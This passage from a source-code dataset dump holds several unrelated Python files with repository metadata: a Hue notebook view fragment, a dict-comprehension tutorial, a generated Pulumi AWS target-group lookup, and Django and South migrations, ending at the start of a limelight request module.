    response['watch_url'] = reverse('notebook:execute_and_watch') + '?action=save_as_table&notebook=' + str(notebook_id) + '&snippet=0&destination=' + destination
response['status'] = 0
elif data_format == 'hdfs-directory':
notebook_id = notebook['id'] or request.GET.get('editor', request.GET.get('notebook'))
    response['watch_url'] = reverse('notebook:execute_and_watch') + '?action=insert_as_query&notebook=' + str(notebook_id) + '&snippet=0&destination=' + destination
response['status'] = 0
return JsonResponse(response)
| 32.771757
| 164
| 0.711194
|
242bfbe0a720164bbe3c5a651de7b96d08c2357d
| 585
|
py
|
Python
|
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | null | null | null |
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | 9
|
2019-11-15T14:21:43.000Z
|
2020-03-15T14:37:13.000Z
|
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
'''
Dictionaries = swap the parentheses for curly braces
i: is the dictionary key
i * 2 = is the value stored for key i
'''
# More elaborate example
dicionario = {f'Item {i}': i * 2 for i in range(10) if i % 2 == 0}
print(dicionario)
# Simpler example
dicionario = {i: i * 2 for i in range(10) if i % 2 == 0}
print(dicionario)
for numero, dobro in dicionario.items():
print(f'{numero} x 2 = {dobro}')
# Sources:
# "Curso Python 3 - Curso Completo do Básico ao Avançado" (Udemy), lessons 108 to 113
# https://github.com/cod3rcursos/curso-python/tree/master/list_comprehension
| 23.4
| 76
| 0.68547
|
c14d2ec4a222593239451ebb9f35b8e93ab003c6
| 10,463
|
py
|
Python
|
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetTargetGroupResult',
'AwaitableGetTargetGroupResult',
'get_target_group',
]
@pulumi.output_type
class GetTargetGroupResult:
"""
A collection of values returned by getTargetGroup.
"""
def __init__(__self__, arn=None, arn_suffix=None, deregistration_delay=None, health_check=None, id=None, lambda_multi_value_headers_enabled=None, load_balancing_algorithm_type=None, name=None, port=None, preserve_client_ip=None, protocol=None, protocol_version=None, proxy_protocol_v2=None, slow_start=None, stickiness=None, tags=None, target_type=None, vpc_id=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if arn_suffix and not isinstance(arn_suffix, str):
raise TypeError("Expected argument 'arn_suffix' to be a str")
pulumi.set(__self__, "arn_suffix", arn_suffix)
if deregistration_delay and not isinstance(deregistration_delay, int):
raise TypeError("Expected argument 'deregistration_delay' to be a int")
pulumi.set(__self__, "deregistration_delay", deregistration_delay)
if health_check and not isinstance(health_check, dict):
raise TypeError("Expected argument 'health_check' to be a dict")
pulumi.set(__self__, "health_check", health_check)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if lambda_multi_value_headers_enabled and not isinstance(lambda_multi_value_headers_enabled, bool):
raise TypeError("Expected argument 'lambda_multi_value_headers_enabled' to be a bool")
pulumi.set(__self__, "lambda_multi_value_headers_enabled", lambda_multi_value_headers_enabled)
if load_balancing_algorithm_type and not isinstance(load_balancing_algorithm_type, str):
raise TypeError("Expected argument 'load_balancing_algorithm_type' to be a str")
pulumi.set(__self__, "load_balancing_algorithm_type", load_balancing_algorithm_type)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if port and not isinstance(port, int):
raise TypeError("Expected argument 'port' to be a int")
pulumi.set(__self__, "port", port)
if preserve_client_ip and not isinstance(preserve_client_ip, str):
raise TypeError("Expected argument 'preserve_client_ip' to be a str")
pulumi.set(__self__, "preserve_client_ip", preserve_client_ip)
if protocol and not isinstance(protocol, str):
raise TypeError("Expected argument 'protocol' to be a str")
pulumi.set(__self__, "protocol", protocol)
if protocol_version and not isinstance(protocol_version, str):
raise TypeError("Expected argument 'protocol_version' to be a str")
pulumi.set(__self__, "protocol_version", protocol_version)
if proxy_protocol_v2 and not isinstance(proxy_protocol_v2, bool):
raise TypeError("Expected argument 'proxy_protocol_v2' to be a bool")
pulumi.set(__self__, "proxy_protocol_v2", proxy_protocol_v2)
if slow_start and not isinstance(slow_start, int):
raise TypeError("Expected argument 'slow_start' to be a int")
pulumi.set(__self__, "slow_start", slow_start)
if stickiness and not isinstance(stickiness, dict):
raise TypeError("Expected argument 'stickiness' to be a dict")
pulumi.set(__self__, "stickiness", stickiness)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if target_type and not isinstance(target_type, str):
raise TypeError("Expected argument 'target_type' to be a str")
pulumi.set(__self__, "target_type", target_type)
if vpc_id and not isinstance(vpc_id, str):
raise TypeError("Expected argument 'vpc_id' to be a str")
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter
def arn(self) -> str:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="arnSuffix")
def arn_suffix(self) -> str:
return pulumi.get(self, "arn_suffix")
@property
@pulumi.getter(name="deregistrationDelay")
def deregistration_delay(self) -> int:
return pulumi.get(self, "deregistration_delay")
@property
@pulumi.getter(name="healthCheck")
def health_check(self) -> 'outputs.GetTargetGroupHealthCheckResult':
return pulumi.get(self, "health_check")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lambdaMultiValueHeadersEnabled")
def lambda_multi_value_headers_enabled(self) -> bool:
return pulumi.get(self, "lambda_multi_value_headers_enabled")
@property
@pulumi.getter(name="loadBalancingAlgorithmType")
def load_balancing_algorithm_type(self) -> str:
return pulumi.get(self, "load_balancing_algorithm_type")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def port(self) -> int:
return pulumi.get(self, "port")
@property
@pulumi.getter(name="preserveClientIp")
def preserve_client_ip(self) -> str:
return pulumi.get(self, "preserve_client_ip")
@property
@pulumi.getter
def protocol(self) -> str:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="protocolVersion")
def protocol_version(self) -> str:
return pulumi.get(self, "protocol_version")
@property
@pulumi.getter(name="proxyProtocolV2")
def proxy_protocol_v2(self) -> bool:
return pulumi.get(self, "proxy_protocol_v2")
@property
@pulumi.getter(name="slowStart")
def slow_start(self) -> int:
return pulumi.get(self, "slow_start")
@property
@pulumi.getter
def stickiness(self) -> 'outputs.GetTargetGroupStickinessResult':
return pulumi.get(self, "stickiness")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetType")
def target_type(self) -> str:
return pulumi.get(self, "target_type")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> str:
return pulumi.get(self, "vpc_id")
class AwaitableGetTargetGroupResult(GetTargetGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTargetGroupResult(
arn=self.arn,
arn_suffix=self.arn_suffix,
deregistration_delay=self.deregistration_delay,
health_check=self.health_check,
id=self.id,
lambda_multi_value_headers_enabled=self.lambda_multi_value_headers_enabled,
load_balancing_algorithm_type=self.load_balancing_algorithm_type,
name=self.name,
port=self.port,
preserve_client_ip=self.preserve_client_ip,
protocol=self.protocol,
protocol_version=self.protocol_version,
proxy_protocol_v2=self.proxy_protocol_v2,
slow_start=self.slow_start,
stickiness=self.stickiness,
tags=self.tags,
target_type=self.target_type,
vpc_id=self.vpc_id)
def get_target_group(arn: Optional[str] = None,
name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTargetGroupResult:
"""
> **Note:** `alb.TargetGroup` is known as `lb.TargetGroup`. The functionality is identical.
Provides information about a Load Balancer Target Group.
This data source can prove useful when a module accepts an LB Target Group as an
input variable and needs to know its attributes. It can also be used to get the ARN of
    an LB Target Group for use in other resources, given the LB Target Group's name.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
lb_tg_arn = config.get("lbTgArn")
if lb_tg_arn is None:
lb_tg_arn = ""
lb_tg_name = config.get("lbTgName")
if lb_tg_name is None:
lb_tg_name = ""
test = aws.lb.get_target_group(arn=lb_tg_arn,
name=lb_tg_name)
```
:param str arn: The full ARN of the target group.
:param str name: The unique name of the target group.
"""
__args__ = dict()
__args__['arn'] = arn
__args__['name'] = name
__args__['tags'] = tags
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:lb/getTargetGroup:getTargetGroup', __args__, opts=opts, typ=GetTargetGroupResult).value
return AwaitableGetTargetGroupResult(
arn=__ret__.arn,
arn_suffix=__ret__.arn_suffix,
deregistration_delay=__ret__.deregistration_delay,
health_check=__ret__.health_check,
id=__ret__.id,
lambda_multi_value_headers_enabled=__ret__.lambda_multi_value_headers_enabled,
load_balancing_algorithm_type=__ret__.load_balancing_algorithm_type,
name=__ret__.name,
port=__ret__.port,
preserve_client_ip=__ret__.preserve_client_ip,
protocol=__ret__.protocol,
protocol_version=__ret__.protocol_version,
proxy_protocol_v2=__ret__.proxy_protocol_v2,
slow_start=__ret__.slow_start,
stickiness=__ret__.stickiness,
tags=__ret__.tags,
target_type=__ret__.target_type,
vpc_id=__ret__.vpc_id)
| 39.935115
| 371
| 0.679442
|
33c3321195d1e5777731d673571e14e44bc85491
| 1,495
|
py
|
Python
|
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-11-11 17:07
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.CharField(max_length=1000)),
('description', models.CharField(max_length=9999)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('teachers', models.ManyToManyField(to='app.Teacher')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=250)),
('description', models.CharField(max_length=9999)),
('ccreated_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('course', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='app.course')),
],
),
]
| 39.342105
| 119
| 0.58194
|
28ac893f00def96e9f2b904a648ac150c6dc31ec
| 20,085
|
py
|
Python
|
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | null | null | null |
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | null | null | null |
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | 2
|
2020-01-13T20:40:09.000Z
|
2020-01-16T15:26:11.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from avocado.models import DataField
class Migration(DataMigration):
def forwards(self, orm):
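        """Initialize each DataField's indexable flag from its existing enumerable and searchable flags."""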
for field in DataField.objects.all():
field.indexable = field.enumerable or field.searchable
field.save()
def backwards(self, orm):
# There is nothing to do here because the indexable field should not
# modify enumerable or searchable even though those are used to
# initially set indexable.
pass
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'avocado.datacategory': {
'Meta': {'ordering': "('parent__order', 'parent__name', 'order', 'name')", 'object_name': 'DataCategory'},
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['avocado.DataCategory']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'avocado.dataconcept': {
'Meta': {'ordering': "('category__order', 'category__name', 'order', 'name')", 'object_name': 'DataConcept'},
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['avocado.DataCategory']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fields': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'concepts'", 'symmetrical': 'False', 'through': u"orm['avocado.DataConceptField']", 'to': u"orm['avocado.DataField']"}),
'formatter_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'concepts+'", 'null': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'indexable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'queryable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'concepts+'", 'blank': 'True', 'to': u"orm['sites.Site']"}),
'sortable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'viewable': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'avocado.dataconceptfield': {
'Meta': {'ordering': "('order', 'name')", 'object_name': 'DataConceptField'},
'concept': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'concept_fields'", 'to': "orm['avocado.DataConcept']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'concept_fields'", 'to': u"orm['avocado.DataField']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'})
},
u'avocado.datacontext': {
'Meta': {'object_name': 'DataContext'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 19, 0, 0)'}),
'count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_column': "'_count'"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataContext']"}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tree': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'datacontext+'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'avocado.datafield': {
'Meta': {'ordering': "('category__order', 'category__name', 'order', 'name')", 'unique_together': "(('app_name', 'model_name', 'field_name'),)", 'object_name': 'DataField'},
'app_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['avocado.DataCategory']", 'null': 'True', 'blank': 'True'}),
'code_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'data_version': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'enumerable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'field_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'fields+'", 'null': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'indexable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'label_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'order_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'search_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'fields+'", 'blank': 'True', 'to': u"orm['sites.Site']"}),
'translator': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'unit_plural': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'})
},
u'avocado.dataquery': {
'Meta': {'object_name': 'DataQuery'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'context_json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'distinct_count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataQuery']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'record_count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'shared_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shareddataquery+'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tree': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dataquery+'", 'null': 'True', 'to': u"orm['auth.User']"}),
'view_json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'})
},
u'avocado.dataview': {
'Meta': {'object_name': 'DataView'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 19, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataView']"}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dataview+'", 'null': 'True', 'to': u"orm['auth.User']"})
},
'avocado.revision': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Revision'},
'changes': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'data': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+revision'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['avocado']
symmetrical = True
| 91.712329
| 216
| 0.561364
|
75bc51cd9904221aae5638bda7cbf32c8d2b8ea9
| 6,318
|
py
|
Python
|
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | 1
|
2015-01-11T16:51:33.000Z
|
2015-01-11T16:51:33.000Z
|
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | null | null | null |
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | 1
|
2018-03-04T21:42:10.000Z
|
2018-03-04T21:42:10.000Z
|
# -*- coding: utf-8 -*-
from copy import copy
try:
# noinspection PyCompatibility
from urllib.parse import parse_qs
except ImportError:
# noinspection PyUnresolvedReferences,PyCompatibility
